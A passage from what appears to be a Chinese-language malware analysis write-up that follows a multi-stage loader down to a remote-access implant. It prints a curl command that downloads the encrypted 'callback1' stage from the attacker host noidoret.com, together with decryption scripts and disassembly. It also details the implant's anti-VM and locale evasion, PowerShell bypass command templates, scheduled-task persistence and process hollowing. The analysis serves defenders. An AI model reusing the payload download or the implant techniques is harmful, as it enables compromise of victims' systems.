re.S)</span><br><span class="line">outer = m.group(<span class="number">1</span>)</span><br><span class="line">mapping = &#123;<span class="string">&quot;М&quot;</span>: <span class="string">&quot;p&quot;</span>,<span class="string">&quot;х&quot;</span>: <span class="string">&quot;a&quot;</span>,<span class="string">&quot;Н&quot;</span>: <span class="string">&quot;9&quot;</span>,<span class="string">&quot;В&quot;</span>: <span class="string">&quot;n&quot;</span>,<span class="string">&quot;У&quot;</span>: <span class="string">&quot;r&quot;</span>,<span class="string">&quot;е&quot;</span>: <span class="string">&quot;b&quot;</span>,<span class="string">&quot;Ц&quot;</span>: <span class="string">&quot;h&quot;</span>&#125;</span><br><span class="line"><span class="keyword">for</span> k, v <span class="keyword">in</span> mapping.items(): outer = outer.replace(k, v)</span><br><span class="line">decoded_py = base64.b64decode(outer).decode(<span class="string">&quot;utf-8&quot;</span>, errors=<span class="string">&quot;replace&quot;</span>)</span><br><span class="line">b64s = re.findall(<span class="string">r&quot;base64\.b64decode\(&#x27;([^&#x27;]+)&#x27;\)&quot;</span>, decoded_py)</span><br><span class="line">cipher = base64.b64decode(b64s[<span class="number">0</span>])</span><br><span class="line">key = base64.b64decode(b64s[<span class="number">1</span>])</span><br><span class="line">shellcode = <span class="built_in">bytes</span>(c ^ key[i % <span class="built_in">len</span>(key)] <span class="keyword">for</span> i, c <span class="keyword">in</span> <span class="built_in">enumerate</span>(cipher))</span><br><span class="line">Path(<span class="string">&quot;stage3_shellcode.bin&quot;</span>).write_bytes(shellcode)</span><br></pre></td></tr></table></figure>

<p>shellcode为32bit，共有8912字节，其中有15个函数，有轻微程度的混淆，且所有WinAPI相关函数都通过硬编码的API hash直接调用，能看出其中包含了硬编码的下载链接<code>https://noidoret[.]com/6d6d2d17-d270-59c6-8b75-df011af08e58/callback1</code>和动态构造的user-agent：<code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36</code>，此外还有一个RC4解密函数，下载的callback1会使用前0x40字节作为密钥解密自身。安全下载callback1：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> -p callback1</span><br><span class="line"><span class="built_in">cd</span> callback1</span><br><span class="line"></span><br><span class="line">curl --proto <span class="string">&#x27;=https&#x27;</span> \</span><br><span class="line">  --tlsv1.2 \</span><br><span class="line">  --connect-timeout 10 \</span><br><span class="line">  --max-time 60 \</span><br><span class="line">  --location \</span><br><span class="line">  --fail \</span><br><span class="line">  --silent \</span><br><span class="line">  --show-error \</span><br><span class="line">  -A <span class="string">&#x27;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36&#x27;</span> \</span><br><span class="line">  -D callback1.headers.txt \</span><br><span class="line">  -o callback1.raw \</span><br><span class="line">  <span class="string">&#x27;https://noidoret.com/6d6d2d17-d270-59c6-8b75-df011af08e58/callback1&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">sha256sum</span> callback1.raw | <span class="built_in">tee</span> callback1.sha256.txt</span><br><span class="line">file callback1.raw</span><br><span class="line">xxd -l 128 callback1.raw</span><br></pre></td></tr></table></figure>

<p>解密：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pathlib <span class="keyword">import</span> Path</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">rc4</span>(<span class="params">key: <span class="built_in">bytes</span>, data: <span class="built_in">bytes</span></span>) -&gt; <span class="built_in">bytes</span>:</span><br><span class="line">    s = <span class="built_in">list</span>(<span class="built_in">range</span>(<span class="number">256</span>))</span><br><span class="line">    j = <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line">        j = (j + s[i] + key[i % <span class="built_in">len</span>(key)]) &amp; <span class="number">0xff</span></span><br><span class="line">        s[i], s[j] = s[j], s[i]</span><br><span class="line">    i = j = <span class="number">0</span></span><br><span class="line">    out = <span class="built_in">bytearray</span>()</span><br><span class="line">    <span class="keyword">for</span> b <span class="keyword">in</span> data:</span><br><span class="line">        i = (i + <span class="number">1</span>) &amp; <span class="number">0xff</span></span><br><span class="line">        j = (j + s[i]) &amp; <span class="number">0xff</span></span><br><span class="line">        s[i], s[j] = s[j], s[i]</span><br><span class="line">        k = s[(s[i] + s[j]) &amp; <span class="number">0xff</span>]</span><br><span class="line">        out.append(b ^ k)</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">bytes</span>(out)</span><br><span class="line"></span><br><span class="line">raw = Path(<span class="string">&quot;callback1.raw&quot;</span>).read_bytes()</span><br><span class="line">key = raw[:<span class="number">0x40</span>]</span><br><span class="line">enc = raw[<span class="number">0x40</span>:]</span><br><span class="line">dec = rc4(key, enc)</span><br><span class="line">Path(<span class="string">&quot;callback1.decrypted.bin&quot;</span>).write_bytes(dec)</span><br></pre></td></tr></table></figure>

<p>解密后观察payload开头：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">seg000:00000000                 jmp     short loc_3A</span><br><span class="line">seg000:00000002                 pop     edi</span><br><span class="line">seg000:00000003                 mov     ecx, [edi]</span><br><span class="line">seg000:00000005                 sub     ecx, 0Ch</span><br><span class="line">seg000:00000008                 mov     esi, ecx</span><br><span class="line">seg000:0000000A                 xor     ecx, ecx</span><br><span class="line">seg000:0000000C                 cmp     ecx, esi</span><br><span class="line">seg000:0000000E                 jz      short loc_2A</span><br><span class="line">seg000:00000010                 mov     eax, ecx</span><br><span class="line">seg000:00000012                 mov     ebx, 8</span><br><span class="line">seg000:00000017                 xor     edx, edx</span><br><span class="line">seg000:00000019                 div     ebx</span><br><span class="line">seg000:0000001B                 lea     ebx, [edi+edx+4]</span><br><span class="line">seg000:0000001F                 mov     al, [ebx]</span><br><span class="line">seg000:00000021                 lea     ebx, [edi+ecx+0Ch]</span><br><span class="line">seg000:00000025                 xor     [ebx], al</span><br><span class="line">seg000:00000027                 inc     ecx</span><br><span class="line">seg000:00000028                 jmp     short loc_C</span><br><span class="line">seg000:0000002A                 lea     eax, [edi+0Ch]</span><br><span class="line">seg000:0000002D                 mov     ecx, [eax]</span><br><span class="line">seg000:0000002F                 lea     eax, [edi+ecx+10h]</span><br><span class="line">seg000:00000033                 lea     edx, [edi+10h]</span><br><span class="line">seg000:00000036                 push    eax</span><br><span class="line">seg000:00000037                 call    edx</span><br><span class="line">seg000:00000039                 retn</span><br><span class="line">seg000:0000003A                 call    loc_2</span><br><span class="line">seg000:0000003F                 dd 48804h ; length，正好是剩下的字节数</span><br><span class="line">seg000:00000043                 db  2Bh,0C6h,0DCh,0ECh, 8Ah,   6,0EAh,   1 ; 密钥</span><br><span class="line">seg000:0000004B                 db  2Bh ; payload开头</span><br><span class="line">seg000:0000004C                 db 0C8h</span><br><span class="line">...后续为密文</span><br></pre></td></tr></table></figure>

<p>注意到一段XOR自解密函数，密钥长度为8，密文长度为0x48804，解密后发现以下特征：加密区域是20个裸shellcode函数+真正的PE载荷，其中前20个函数是 x86 反射 PE Loader，它们负责把内嵌的 PE 文件正确映射到内存后跳到 PE 的入口点，执行路线大致为<code>sub_4F -&gt; sub_7AF -&gt; sub_99F -&gt; sub_ACF -&gt; sub_C0F -&gt; sub_D3F -&gt; sub_DAF -&gt; sub_DFF</code>。提取最后的PE文件（起始地址位于0xE4F），接下来进行最内层载荷分析。</p>
<h2 id="4-内层载荷分析"><a href="#4-内层载荷分析" class="headerlink" title="4. 内层载荷分析"></a>4. 内层载荷分析</h2><p>内层载荷较为复杂，但有很多十分明显的特征：</p>
<h3 id="C2通信特征"><a href="#C2通信特征" class="headerlink" title="C2通信特征"></a>C2通信特征</h3><p>在data段中有大量RTTI &#x2F; vtable：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">connection::containers::ContainerFieldBlob</span><br><span class="line">connection::containers::ContainerFieldStringA</span><br><span class="line">connection::containers::ContainerFieldStringW</span><br><span class="line">connection::containers::ContainerFieldInt32</span><br><span class="line">connection::containers::ContainerFieldUint8</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>应该是用于C2通信的数据类型相关定义，在其他函数的xref中也能看到解析不同 type 并创建对应 <code>ContainerField*</code> 对象的逻辑，例如 <code>ContainerFieldBlob</code>、<code>ContainerFieldStringA/W</code>、<code>ContainerFieldInt64/Uint64</code> 等，核心解析函数位于<code>sub_402790</code>。</p>
<h3 id="Windll、API相关函数调用隐藏"><a href="#Windll、API相关函数调用隐藏" class="headerlink" title="Windll、API相关函数调用隐藏"></a>Windll、API相关函数调用隐藏</h3><p>程序中含有自实现的API hash查询调用、分类加载dll等函数，负责哈希查询的函数为<code>sub_420E60</code>，其部分函数哈希特征对应如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">CoInitializeEx          -&gt; 0xB68C3650</span><br><span class="line">CoInitializeSecurity    -&gt; 0x35BE4658</span><br><span class="line">CreateMutexW            -&gt; 0x392DA044</span><br><span class="line">GetLastError            -&gt; 0x5886C22B</span><br><span class="line">ExitProcess             -&gt; 0x607048B2</span><br><span class="line">CreateThread            -&gt; 0x7A27DBCB</span><br><span class="line">HeapAlloc               -&gt; 0xF886F994</span><br><span class="line">SHGetFolderPathW        -&gt; 0x7068A692</span><br><span class="line">PathAppendW             -&gt; 0xCB712BE0</span><br><span class="line">CreateFileW             -&gt; 0x391B6225</span><br><span class="line">WaitForSingleObject     -&gt; 0xFDB07F94</span><br><span class="line">CoUninitialize          -&gt; 0xD883842C</span><br></pre></td></tr></table></figure>

<p><code>sub_4210A0</code>负责加载各种dll，其dll列表有：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">HMODULE <span class="title">get_module_by_id</span><span class="params">(<span class="type">int</span> id)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">switch</span> (id) &#123;</span><br><span class="line">        <span class="keyword">case</span> <span class="number">0</span>:  <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;ntdll.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">1</span>:  <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;kernel32.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">2</span>:  <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;ole32.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">3</span>:  <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;oleaut32.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">4</span>:  <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;user32.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">5</span>:  <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;advapi32.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">6</span>:  <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;shell32.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">7</span>:  <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;ws2_32.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">8</span>:  <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;shlwapi.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">9</span>:  <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;wininet.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">10</span>: <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;winhttp.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">11</span>: <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;psapi.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">12</span>: <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;crypt32.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">13</span>: <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;gdi32.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">case</span> <span class="number">14</span>: <span class="keyword">return</span> <span class="built_in">get_or_load</span>(<span class="string">L&quot;iphlpapi.dll&quot;</span>);</span><br><span class="line">        <span class="keyword">default</span>: <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="内置加密算法"><a href="#内置加密算法" class="headerlink" title="内置加密算法"></a>内置加密算法</h3><p><code>sub_401480</code>是一个Chacha类流密码的核心函数，在临近的函数<code>sub_402570</code>中甚至能看到硬编码的明文字符串<code>expand 32-byte k</code>，在重要业务逻辑函数<code>sub_403630</code>（指令分发函数）中能看到其被调用，该函数位于C2通信解析函数<code>sub_402790</code>之后，因此C2通信的包体内容大概率是加密的，在程序中被解密后解析。</p>
<h3 id="反分析与环境检查"><a href="#反分析与环境检查" class="headerlink" title="反分析与环境检查"></a>反分析与环境检查</h3><h4 id="CPUID-虚拟机检测"><a href="#CPUID-虚拟机检测" class="headerlink" title="CPUID 虚拟机检测"></a>CPUID 虚拟机检测</h4><p><code>sub_401320</code> 执行 <code>cpuid 0x40000000</code>，然后比较 hypervisor vendor 字符串。其中比较了硬编码的 VMware 字符串，推测其有反虚拟机功能，匹配后构造异常结构并调用动态解析出来的 ntdll 函数，从而中止程序。</p>
<h4 id="语言-区域规避"><a href="#语言-区域规避" class="headerlink" title="语言 &#x2F; 区域规避"></a>语言 &#x2F; 区域规避</h4><p>sub_401100<code>取某个系统值后</code>&amp; 0x3FF&#96;，然后和一组数字比较：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">25, 35, 63, 40, 67, 43, 44, 64, 55, 34</span><br></pre></td></tr></table></figure>

<p>类似 Windows LANGID 的 primary language ID。命中后会检查一个解混淆出来的标记路径 &#x2F; 文件，失败则触发异常。</p>
<h4 id="安全软件枚举"><a href="#安全软件枚举" class="headerlink" title="安全软件枚举"></a>安全软件枚举</h4><p>字符串和<code>sub_4108C0</code>里出现：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">root\SecurityCenter2</span><br><span class="line">WQL</span><br><span class="line">displayName</span><br></pre></td></tr></table></figure>

<p>等杀毒软件相关名称，大概率会环境内杀毒软件类型并上报给 C2，或者根据环境决定后续 payload。</p>
<h3 id="命令执行能力"><a href="#命令执行能力" class="headerlink" title="命令执行能力"></a>命令执行能力</h3><p>字符串中直接出现了这些执行模板：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/c &quot;</span><br><span class="line">runas</span><br><span class="line">open</span><br><span class="line">-ExecutionPolicy Bypass -NoProfile -EncodedCommand &quot;%s&quot;</span><br><span class="line">-ExecutionPolicy Bypass -NoProfile -Command &quot;%s&quot;</span><br><span class="line">--headless %s</span><br><span class="line">cmd.exe</span><br><span class="line">-ExecutionPolicy Bypass -NoProfile -File &quot;%s&quot; %s</span><br></pre></td></tr></table></figure>

<p>这些字符串都在命令执行相关函数中有xref，反编译里也能看到格式化：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;-ExecutionPolicy Bypass -NoProfile -File \&quot;%s\&quot; %s&quot;</span><br></pre></td></tr></table></figure>

<p>然后进行 <code>open</code> 或 <code>runas</code>，因此其至少支持这些任务类型：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">1. 普通 ShellExecute open 执行</span><br><span class="line">2. ShellExecute runas 提权弹 UAC</span><br><span class="line">3. cmd.exe /c 包裹执行</span><br><span class="line">4. powershell -EncodedCommand 执行</span><br><span class="line">5. powershell -Command 执行</span><br><span class="line">6. powershell -File 执行本地脚本</span><br><span class="line">7. 某种 --headless 参数的程序启动</span><br></pre></td></tr></table></figure>

<p><code>sub_413B20</code> 一类函数还会根据配置选择 <code>runas</code> 或 <code>open</code>，并可选择等待进程结束 &#x2F; 关闭句柄。 </p>
<h3 id="文件落地、解压操作"><a href="#文件落地、解压操作" class="headerlink" title="文件落地、解压操作"></a>文件落地、解压操作</h3><p>导入表里有完整文件操作链：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">CreateDirectoryW</span><br><span class="line">CreateFileW</span><br><span class="line">ReadFile</span><br><span class="line">WriteFile</span><br><span class="line">SetFileTime</span><br><span class="line">GetFileAttributesW</span><br><span class="line">FindFirstFileExW</span><br><span class="line">FindNextFileW</span><br><span class="line">CloseHandle</span><br></pre></td></tr></table></figure>

<p>并且解压相关函数里检查了：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">67324752 == 0x04034B50 == ZIP local file header &quot;PK\x03\x04&quot;</span><br></pre></td></tr></table></figure>

<p>说明其还内置 ZIP 解析 &#x2F; 解压逻辑；另一个业务逻辑函数也有：若服务端 blob 不是 ZIP，就按普通文件写出；如果开头是 ZIP，则进入 <code>sub_41FB60()</code> 之类的解压路径。</p>
<p>因此其能做到：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1. 从 C2 接收原始文件 blob</span><br><span class="line">2. 写入磁盘</span><br><span class="line">3. 设置文件时间 SetFileTime 伪装时间戳</span><br><span class="line">4. 如果是 ZIP，则解压多个文件</span><br><span class="line">5. 枚举目录内容</span><br></pre></td></tr></table></figure>

<h3 id="持久化能力"><a href="#持久化能力" class="headerlink" title="持久化能力"></a>持久化能力</h3><p>导入表中有 <code>CoCreateInstance</code>，并且 xref 明确指向 <code>sub_41A6E0</code> &#x2F; <code>sub_41AF30</code>，类似 <code>Windows Task Scheduler COM API</code>，能创建计划任务进行持久化，相邻函数 <code>sub_41AF30</code> 可能是查询 &#x2F; 删除 &#x2F; 修改任务。相关逻辑链大致为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">CoCreateInstance(TaskScheduler)</span><br><span class="line">  ↓</span><br><span class="line">ITaskService::Connect</span><br><span class="line">  ↓</span><br><span class="line">GetFolder / NewTask</span><br><span class="line">  ↓</span><br><span class="line">设置 Action / Trigger / Principal</span><br><span class="line">  ↓</span><br><span class="line">RegisterTaskDefinition</span><br></pre></td></tr></table></figure>

<h3 id="进程注入-PE-内存执行能力"><a href="#进程注入-PE-内存执行能力" class="headerlink" title="进程注入 &#x2F; PE 内存执行能力"></a>进程注入 &#x2F; PE 内存执行能力</h3><p>程序中还有：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">CreateProcessW</span><br><span class="line">VirtualAllocEx</span><br><span class="line">WriteProcessMemory</span><br><span class="line">ReadProcessMemory</span><br><span class="line">MZ / PE 文件头检查</span><br><span class="line">relocation type 1 / 2 / 3</span><br><span class="line">写入远程进程内存</span><br><span class="line">设置线程上下文 / 恢复线程</span><br></pre></td></tr></table></figure>

<p><code>sub_417750</code>存在创建进程，在目标进程里申请内存、写入 payload，随后判断类型，再按 relocation type 修正远程内存中的 PE的能力。因此其还支持<code>process hollowing / PE injection</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1. 创建挂起进程</span><br><span class="line">2. 把 PE payload 写入远程进程</span><br><span class="line">3. 修 relocation</span><br><span class="line">4. 修改入口点 / 线程上下文</span><br><span class="line">5. 恢复执行</span><br></pre></td></tr></table></figure>

<h3 id="总体逻辑"><a href="#总体逻辑" class="headerlink" title="总体逻辑"></a>总体逻辑</h3><p>main在还原后大致可写为：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    Config *cfg;</span><br><span class="line">    C2Result *result = <span class="literal">NULL</span>;</span><br><span class="line">    HANDLE worker_thread = <span class="literal">NULL</span>;</span><br><span class="line">    WCHAR *marker_path;</span><br><span class="line">    <span class="built_in">ole32_CoInitializeEx</span>(<span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">ole32_CoInitializeSecurity</span>(<span class="literal">NULL</span>, <span class="number">-1</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, <span class="literal">NULL</span>, EOAC_NONE, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">locale_geofence_marker_check</span>(); <span class="comment">// sub_401100</span></span><br><span class="line">    cfg = <span class="built_in">build_or_decode_config</span>(); <span class="comment">// sub_40B3A0</span></span><br><span class="line">    <span class="built_in">kernel32_CreateMutexW</span>(<span class="literal">NULL</span>, FALSE, cfg-&gt;mutex_name);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">kernel32_GetLastError</span>() == ERROR_ALREADY_EXISTS) &#123; <span class="built_in">kernel32_ExitProcess</span>(<span class="number">0</span>); &#125; <span class="comment">// 183</span></span><br><span class="line">    result = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">c2_request_and_parse_packet</span>(&amp;result, cfg)) &#123;</span><br><span class="line">        <span class="keyword">if</span> (result-&gt;flags[<span class="number">3</span>] &amp;&amp; !g_worker_thread) &#123; g_worker_thread = <span class="built_in">kernel32_CreateThread</span>(<span class="literal">NULL</span>, <span class="number">0</span>, worker_thread_proc <span class="comment">/* sub_40E190 */</span>, <span class="literal">NULL</span>, <span class="number">0</span>, <span class="literal">NULL</span>); &#125;</span><br><span class="line">        <span class="keyword">if</span> (result-&gt;flags[<span class="number">1</span>]) &#123; <span class="built_in">check_hypervisor_vendor_and_abort</span>() <span class="comment">/* sub_401320 */</span>; &#125;</span><br><span class="line">        <span class="keyword">if</span> (result-&gt;flags[<span class="number">2</span>]) &#123;</span><br><span class="line">            cfg = <span class="built_in">build_or_decode_config</span>();</span><br><span class="line">            marker_path = <span class="built_in">kernel32_HeapAlloc</span>(g_heap, <span class="number">0</span>, <span class="number">520</span>);</span><br><span class="line">            <span class="keyword">if</span> (marker_path) &#123;</span><br><span class="line">                <span class="keyword">if</span> (<span class="built_in">shell32_SHGetFolderPathW</span>(<span class="literal">NULL</span>,CSIDL_COMMON_APPDATA<span class="comment">/*0x23*/</span>,<span class="literal">NULL</span>,<span class="number">0</span>,marker_path)&gt;=<span class="number">0</span>)&#123;</span><br><span class="line">                    <span class="built_in">shlwapi_PathAppendW</span>(marker_path, cfg-&gt;marker_name);</span><br><span class="line">                    HANDLE h = <span class="built_in">kernel32_CreateFileW</span>(marker_path, GENERIC_READ, <span class="number">0</span>, <span class="literal">NULL</span>, OPEN_EXISTING, FILE_ATTRIBUTE_HIDDEN, <span class="literal">NULL</span>);</span><br><span class="line">                    <span class="keyword">if</span> (h == INVALID_HANDLE_VALUE) &#123; <span class="built_in">kernel32_CreateFileW</span>(marker_path, GENERIC_ALL, <span class="number">0</span>, <span class="literal">NULL</span>, OPEN_ALWAYS, FILE_ATTRIBUTE_HIDDEN, <span class="literal">NULL</span>); &#125; <span class="keyword">else</span> &#123; <span class="built_in">kernel32_ExitProcess</span>(<span class="number">0</span>); &#125;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="built_in">free_wrapper</span>(marker_path);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (result-&gt;flags[<span class="number">0</span>]) &#123; <span class="built_in">run_cmd_wrapper</span>(); &#125; <span class="comment">// sub_411980</span></span><br><span class="line">        <span class="built_in">command_dispatcher</span>(&amp;result, inject_pe_into_process <span class="comment">/* sub_417750 */</span>, cfg); <span class="comment">// sub_403630</span></span><br><span class="line">        <span class="keyword">if</span> (result-&gt;flags[<span class="number">3</span>] &amp;&amp; g_worker_thread) &#123;<span class="built_in">kernel32_WaitForSingleObject</span>(g_worker_thread, INFINITE);&#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">ole32_CoUninitialize</span>();</span><br><span class="line">    <span class="built_in">kernel32_ExitProcess</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>即：</p>
